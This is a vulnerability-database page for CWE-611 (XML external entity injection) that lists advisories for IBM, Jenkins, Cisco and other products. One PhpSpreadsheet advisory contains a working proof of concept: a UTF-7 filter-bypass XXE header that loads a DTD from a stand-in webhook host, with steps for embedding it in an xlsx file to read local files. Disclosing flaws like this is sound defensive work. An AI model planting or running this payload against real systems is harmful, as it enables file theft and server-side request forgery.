Common Weakness Enumeration

CWE-611

Allowed

Improper Restriction of XML External Entity Reference

Abstraction: Base · Status: Draft

The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output.

1694 vulnerabilities reference this CWE, most recent first.

GHSA-GG63-HGM5-V538

Vulnerability from github – Published: 2024-02-03 03:30 – Updated: 2025-11-04 00:30
VLAI
Details

IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 254783.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-32327"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-02-03T01:15:08Z",
    "severity": "HIGH"
  },
  "details": "IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources.  IBM X-Force ID:  254783.",
  "id": "GHSA-gg63-hgm5-v538",
  "modified": "2025-11-04T00:30:45Z",
  "published": "2024-02-03T03:30:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32327"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/254783"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/7106586"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2024/Nov/0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GG84-HM7C-X3XQ

Vulnerability from github – Published: 2022-05-14 01:36 – Updated: 2022-05-14 01:36
VLAI
Details

Anyplace version before commit 80359b4 contains a XML External Entity (XXE) vulnerability in Man in the middle on map API call that can result in Disclosure of confidential data, denial of service, SSRF, port scanning. This vulnerability appears to have been fixed in after commit 80359b4.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-1000829"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-12-20T15:29:00Z",
    "severity": "CRITICAL"
  },
  "details": "Anyplace version before commit 80359b4 contains a XML External Entity (XXE) vulnerability in Man in the middle on map API call that can result in Disclosure of confidential data, denial of service, SSRF, port scanning. This vulnerability appears to have been fixed in after commit 80359b4.",
  "id": "GHSA-gg84-hm7c-x3xq",
  "modified": "2022-05-14T01:36:12Z",
  "published": "2022-05-14T01:36:12Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000829"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dmsl/anyplace/issues/263"
    },
    {
      "type": "WEB",
      "url": "https://0dd.zone/2018/10/28/anyplace-XXE-MitM"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GGPQ-CPRG-V67R

Vulnerability from github – Published: 2022-12-06 18:30 – Updated: 2022-12-08 18:30
VLAI
Details

An XML external entity (XXE) injection vulnerability in Kwoksys Kwok Information Server before v2.9.5.SP31 allows remote authenticated users to conduct server-side request forgery (SSRF) attacks.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-45326"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-12-06T17:15:00Z",
    "severity": "MODERATE"
  },
  "details": "An XML external entity (XXE) injection vulnerability in Kwoksys Kwok Information Server before v2.9.5.SP31 allows remote authenticated users to conduct server-side request forgery (SSRF) attacks.",
  "id": "GHSA-ggpq-cprg-v67r",
  "modified": "2022-12-08T18:30:49Z",
  "published": "2022-12-06T18:30:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-45326"
    },
    {
      "type": "WEB",
      "url": "https://www.navsec.net/2022/11/12/kwoksys-xxe.html"
    },
    {
      "type": "WEB",
      "url": "http://www.kwoksys.com/wiki/index.php?title=Release_Notes"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GHG6-32F9-2JP7

Vulnerability from github – Published: 2024-08-29 17:58 – Updated: 2025-03-06 18:10
VLAI
Summary
XXE in PHPSpreadsheet encoding is returned
Details

Summary

Bypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack)

Details

Check $pattern = '/encoding="(.*?)"/'; easy to bypass. Just use a single quote symbol '. So payload looks like this:

<?xml version="1.0" encoding='UTF-7' standalone="yes"?>
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"> %xxe;]>

If you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute.

PoC

1) Create simple xlsx file 2) Rename xlsx to zip 3) Go to the zip and open the xl/sharedStrings.xml file in edit mode. 4) Replace <?xml version="1.0" encoding="UTF-8" standalone="yes"?> to

<?xml version="1.0" encoding='UTF-7' standalone="yes"?>
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"> %xxe;]>

5) Save sharedStrings.xml file and rename zip back to xlsx. 6) Use minimal php code that simply opens this xlsx file:

use PhpOffice\PhpSpreadsheet\IOFactory;
require __DIR__ . '/vendor/autoload.php';
$spreadsheet = IOFactory::load("file.xlsx");

7) You will receive the request to your http://%webhook%/file.dtd 8) Dont't forget that you can use php-wrappers into xxe, some php:// wrapper payload allows fetch local files.

Impact

Read local files lfi

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.29.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.2.0"
            },
            {
              "fixed": "2.2.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0"
            },
            {
              "fixed": "2.1.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpexcel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-45048"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-08-29T17:58:27Z",
    "nvd_published_at": "2024-08-28T21:15:06Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nBypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack) \n\n### Details\nCheck ` $pattern = \u0027/encoding=\"(.*?)\"/\u0027;` easy to bypass. Just use a single quote symbol `\u0027`. So payload looks like this:\n```\n\u003c?xml version=\"1.0\" encoding=\u0027UTF-7\u0027 standalone=\"yes\"?\u003e\n+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM \"http://example.com/file.dtd\"\u003e %xxe;]\u003e\n```\nIf you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute. \n\n### PoC\n1) Create simple xlsx file\n2) Rename xlsx to zip\n3) Go to the zip and open the `xl/sharedStrings.xml` file in edit mode.\n4) Replace `\u003c?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?\u003e` to \n```\n\u003c?xml version=\"1.0\" encoding=\u0027UTF-7\u0027 standalone=\"yes\"?\u003e\n+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM \"http://%webhook%/file.dtd\"\u003e %xxe;]\u003e\n```\n5) Save `sharedStrings.xml` file and rename zip back to xlsx.\n6) Use minimal php code that simply opens this xlsx file:\n```\nuse PhpOffice\\PhpSpreadsheet\\IOFactory;\nrequire __DIR__ . \u0027/vendor/autoload.php\u0027;\n$spreadsheet = IOFactory::load(\"file.xlsx\");\n```\n7) You will receive the request to your `http://%webhook%/file.dtd`\n8) Dont\u0027t forget that you can use php-wrappers into xxe, some php:// wrapper payload allows fetch local files.\n\n### Impact\nRead local files\n![lfi](https://github.com/PHPOffice/PhpSpreadsheet/assets/95242087/1839cddb-6bb0-486d-8884-9ac485776931)",
  "id": "GHSA-ghg6-32f9-2jp7",
  "modified": "2025-03-06T18:10:41Z",
  "published": "2024-08-29T17:58:27Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45048"
    },
    {
      "type": "WEB",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "XXE in PHPSpreadsheet encoding is returned"
}

GHSA-GHJW-FCF6-RPR9

Vulnerability from github – Published: 2023-09-06 15:30 – Updated: 2024-01-09 20:58
VLAI
Summary
Job Configuration History Plugin's path traversal allows exploiting XXE vulnerability
Details

Jenkins Job Configuration History Plugin 1227.v7a_79fc4dc01f and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c 1229.v3039470161a"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "org.jenkins-ci.plugins:jobConfigHistory"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1229.v3039470161a_d"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-41933"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-01-09T20:58:13Z",
    "nvd_published_at": "2023-09-06T13:15:10Z",
    "severity": "HIGH"
  },
  "details": "Jenkins Job Configuration History Plugin 1227.v7a_79fc4dc01f and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.",
  "id": "GHSA-ghjw-fcf6-rpr9",
  "modified": "2024-01-09T20:58:13Z",
  "published": "2023-09-06T15:30:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41933"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jenkinsci/job-config-history-plugin/commit/3039470161ada86f4091c75fc779ebfdb69f3210"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/jenkinsci/job-config-history-plugin"
    },
    {
      "type": "WEB",
      "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3235"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Job Configuration History Plugin\u0027s path traversal allows exploiting XXE vulnerability"
}

GHSA-GHWC-HRR9-VJ2W

Vulnerability from github – Published: 2025-12-24 21:30 – Updated: 2025-12-24 21:30
VLAI
Details

NovaRad NovaPACS Diagnostics Viewer 8.5.19.75 contains an unauthenticated XML External Entity (XXE) injection vulnerability in XML preference import settings. Attackers can craft malicious XML files with DTD parameter entities to retrieve arbitrary system files through an out-of-band channel attack.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-25142"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-12-24T20:15:48Z",
    "severity": "HIGH"
  },
  "details": "NovaRad NovaPACS Diagnostics Viewer 8.5.19.75 contains an unauthenticated XML External Entity (XXE) injection vulnerability in XML preference import settings. Attackers can craft malicious XML files with DTD parameter entities to retrieve arbitrary system files through an out-of-band channel attack.",
  "id": "GHSA-ghwc-hrr9-vj2w",
  "modified": "2025-12-24T21:30:31Z",
  "published": "2025-12-24T21:30:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-25142"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/45337"
    },
    {
      "type": "WEB",
      "url": "https://www.novarad.net"
    },
    {
      "type": "WEB",
      "url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5488.php"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-GJG3-8MX2-7F8F

Vulnerability from github – Published: 2023-07-06 19:24 – Updated: 2025-02-06 18:30
VLAI
Details

cgi-bin/xmlstatus.cgi in Güralp MAN-EAM-0003 3.2.4 is vulnerable to an XML External Entity (XXE) issue via XML file upload, which leads to local file disclosure.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-38840"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-04-16T02:15:00Z",
    "severity": "HIGH"
  },
  "details": "cgi-bin/xmlstatus.cgi in G\u00fcralp MAN-EAM-0003 3.2.4 is vulnerable to an XML External Entity (XXE) issue via XML file upload, which leads to local file disclosure.",
  "id": "GHSA-gjg3-8mx2-7f8f",
  "modified": "2025-02-06T18:30:59Z",
  "published": "2023-07-06T19:24:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-38840"
    },
    {
      "type": "WEB",
      "url": "https://drive.google.com/drive/folders/1UG5IcL8fFp9MV0vjd78_cx6iXKda5bpM?usp=sharing"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/171439/MAN-EAM-0003-3.2.4-XML-Injection.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GJRQ-R2PC-24VF

Vulnerability from github – Published: 2022-05-24 19:16 – Updated: 2022-05-24 19:16
VLAI
Details

A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to access sensitive information or conduct a server-side request forgery (SSRF) attack through an affected device. This vulnerability is due to improper handling of XML External Entity (XXE) entries when parsing certain XML files. An attacker could exploit this vulnerability by uploading a crafted XML file that contains references to external entities. A successful exploit could allow the attacker to retrieve files from the local system, resulting in the disclosure of sensitive information, or cause the web application to perform arbitrary HTTP requests on behalf of the attacker.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-34706"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-10-06T20:15:00Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to access sensitive information or conduct a server-side request forgery (SSRF) attack through an affected device. This vulnerability is due to improper handling of XML External Entity (XXE) entries when parsing certain XML files. An attacker could exploit this vulnerability by uploading a crafted XML file that contains references to external entities. A successful exploit could allow the attacker to retrieve files from the local system, resulting in the disclosure of sensitive information, or cause the web application to perform arbitrary HTTP requests on behalf of the attacker.",
  "id": "GHSA-gjrq-r2pc-24vf",
  "modified": "2022-05-24T19:16:40Z",
  "published": "2022-05-24T19:16:40Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-34706"
    },
    {
      "type": "WEB",
      "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-xxe-inj-V4VSjEsX"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-GM25-RHMW-47GF

Vulnerability from github – Published: 2022-07-20 00:00 – Updated: 2022-07-28 00:00
VLAI
Details

IBM Sterling Partner Engagement Manager 6.1.2, 6.2, and Cloud/SasS 22.2 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 220651.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-22358"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-07-19T17:15:00Z",
    "severity": "HIGH"
  },
  "details": "IBM Sterling Partner Engagement Manager 6.1.2, 6.2, and Cloud/SasS 22.2 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 220651.",
  "id": "GHSA-gm25-rhmw-47gf",
  "modified": "2022-07-28T00:00:54Z",
  "published": "2022-07-20T00:00:19Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-22358"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/220651"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/6604993"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GM54-MW9W-8CV2

Vulnerability from github – Published: 2021-12-02 00:00 – Updated: 2021-12-04 00:01
VLAI
Details

CloverDX Server before 5.11.2 and and 5.12.x before 5.12.1 allows XXE during configuration import.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-42776"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-12-01T17:15:00Z",
    "severity": "HIGH"
  },
  "details": "CloverDX Server before 5.11.2 and and 5.12.x before 5.12.1 allows XXE during configuration import.",
  "id": "GHSA-gm54-mw9w-8cv2",
  "modified": "2021-12-04T00:01:26Z",
  "published": "2021-12-02T00:00:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-42776"
    },
    {
      "type": "WEB",
      "url": "https://support.cloverdx.com/releases"
    },
    {
      "type": "WEB",
      "url": "https://support1.cloverdx.com/hc/en-us/articles/4411125429010"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

Mitigation
Implementation System Configuration

Many XML parsers and validators can be configured to disable external entity expansion.

CAPEC-221: Data Serialization External Entities Blowup

This attack takes advantage of the entity replacement property of certain data serialization languages (e.g., XML, YAML, etc.) where the value of the replacement is a URI. A well-crafted file could have the entity refer to a URI that consumes a large amount of resources to create a denial of service condition. This can cause the system to either freeze, crash, or execute arbitrary code depending on the URI.